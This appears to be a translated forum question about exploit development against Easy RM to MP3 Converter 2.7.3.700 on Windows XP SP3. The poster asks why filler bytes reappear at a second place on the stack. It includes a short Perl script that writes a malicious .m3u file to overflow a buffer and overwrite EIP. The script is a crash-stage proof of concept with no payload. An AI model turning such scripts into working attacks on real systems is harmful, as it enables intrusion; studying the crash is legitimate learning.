Некоторое время назад, работая над эксплойтом для Easy RM в MP3 Converter 2.7.3.700 в Windows XP SP3 (http://www.exploit -db.com / exploits / 9177 / ), я наткнулся на концепцию, которая Я не понимаю, это выглядит так:
Perl-скрипт для создания вредоносного файла:
my $junk = "\x41" x 25000;
my $offset = "\x42" x 1072;
my $eip = "\x43" x 4;
my $file = "crash.m3u";
open ($file,">$file");
print $file $junk.$offset.$eip.$adjustment;
close ($file);
после генерации вредоносного файла передайте его в конвертер, и они проанализируют содержимое стека в [esp + 18] (обращаясь к esp) ... почему эти A здесь?
Я имею в виду:
А начинается с [ESP-88E8] до [ESP-43C]
B начинается с [ESP-438] до [ESP-C]
C на [ESP-8]
тогда почему эти А снова находятся в [ESP + 18] до [ESP + 418]? почему эти А повторяются в [ESP + 18] до [ESP + 418], когда они уже были размещены из [ESP-88E8] в [ESP-43C] .. ??
Спасибо.